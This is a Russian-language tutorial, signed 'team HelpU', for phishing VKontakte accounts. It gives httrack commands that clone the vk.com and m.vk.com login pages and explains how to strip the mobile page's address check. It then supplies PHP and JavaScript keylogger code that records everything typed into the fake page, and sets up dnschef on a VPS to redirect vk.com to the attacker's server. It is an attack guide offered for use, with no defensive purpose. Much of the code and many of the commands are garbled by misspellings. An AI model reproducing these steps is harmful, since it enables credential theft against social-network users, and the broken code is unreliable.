В данной статье команда HelpU, подробно опишет схему фишинга аккаунтов популярной социальной сети ВКонтакте.
Итак, поехали.
Для работы нам понадобится Kali Linux самой последней версии, которая есть на данный момент, а также знания httrack о нём мы писали ранее. Но для сайта VK, мы опишем всё индивидуально.
Итак, берём сайт: vk.com. На данном этапе все не сложно, можно просто скопировать. Но лишь одно, если просто скопировать исходный код страницы, получаем такую «грязь»:
Совсем непрезентабельно…
Будем клонировать сайт, а точнее его приветственную страницу. Для этого будем использовать httrack. На самом деле эта программа уникальна, она может копировать, как весь сайт, так и его отдельные части.
Самый простой запуск этой программы будет выглядеть примерно так:
httrack vk.com -O /var/www/html
Но для VK не советуем так делать, ибо копировать весь VK, не самая умная затея. Это чаще делается на сайтах поменьше, для полного анализа структуры, всех папок и файлов. Но на данном этапе будем действовать по иному сценарию.
Для начала надо использовать параметр для ввода пользовательского агента.
Соответственно будем использовать параметр:
-F Mozilla/5.0 (Windows NT 6.1) ApleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.228.0 Safari/537.36
Далее нам нужен будет параметр -r2 для копирования, Внимание! Только лишь одной страницы!
Итак, соберем все в кучу и получим следующее:
httrack https://vk.com -r2 -F Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.228.0 Safari/537.36 -O "/var/www/html/vk.com"
После этого увидим:
Сайт будет скопирован. В папке vk.com будут несколько файлов, которые сделал httrack, их можно удалить и оставить только одну папку vk.com
Удаляем, перемещаем файлы из подпапки vk.com в папку vk.com повыше, и тогда у нас не будет в адресной строке путь: localhost/vk.com/vk.com
После манипуляций с файлами адрес будет: localhost/vk.com
С веб версией все понятно. Но если вы попробуете скопировать мобильную версию ВКонтакте (m.vk.com), возникнут некоторые трудности, там javascript проверяет достоверность адреса и не дает странице прогрузиться. Но и на это, есть своя уязвимость.
Команда будет следующей:
httrack https://m.vk.com -r2 -F "Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; LG-L160L Build/IML74K) AppleWebkit/999+ (KHTML, like Gecko) Safari/999.9" -O "/var/www/html/mvk/"
Когда сайт скопируется и вы попробуете на него зайти, у вас ничего не выйдет, поэтому надо обязательно выполнить следующую команду:
nano /var/www/html/mvk/m.vk.com/index.html
Выделяем строку, которая выделена на скриншоте и удаляем её.
И сайт отлично работает.
Итак, у нас есть сайты, которые идентичны оригинальным. Но логи нигде не сохраняются, и посмотреть, кто что вбивал в поля у нас не получится, поэтому приступим к веб-программированию. Мы внедрим в наш сайт keylogger, напишем его на php и javascript.
Создадим 3 файла keylogger.php, keylogger.js и keylog.txt
В keylogger.php вводим:
<?php
$key=$_POST['key'];
$logfile="keylog.txt";
$fp = fopen($logfile, "a");
fwrite($fp, $key);
fclose($fp);
?>
В keyloger.js вводим:
document.onkeypres = funcion(evt) { evt = evt || window.evnt key = String.fromCharode(evt.charode) if (key) { var http = new XMLHtpRequest(); var parm = encodeURI(key) http.open("POST","keylogger.php",true); http.setReqestHeder("Contnt-type","aplication/x-ww-form-urlenoded"); http.send("key="+parm); } }
Далее
в наш index.php надо добавить строку:
Готово, мы сделали keylogger.
Теперь приступаем к редактированию index.php: ищем строчку «Log in» и ищем параметр onclick=’top.showBox’ (меняем адрес на https://vk.com)
После этого при нажатии на кнопку Log in пользователь будет направлен на официальный сайт ВКонтакте.
Входим через SSH на VPS.
# wget htps://thesprwl.org/media/projcts/dnscef-0.3.zip # unzip dnscef-0.3.zip # cd dnshef* # chod 755 *.py
Лучшим решением будет таким, что лучше всего здесь поставить следующие параметры:
# pi instal dnslib # pi instal IPy
Создаём файл: hosts.txt
В него пишем следующее:
[A]
(URL-адрес сайта, в нашем случае vk.com=IP_ВАШЕГО_VPS)
Прописывая следующу команду, мы всё запустим:
./dnschf.py -i 0.0.0.0 --logfle=log.txt --file=hosts.txt
Готово, ваш DNS успешно работает. Он возвращает наши адреса нам.
На этом всё, мы надеемся данная статья была полезной для вас.
С уважением, команда HelpU.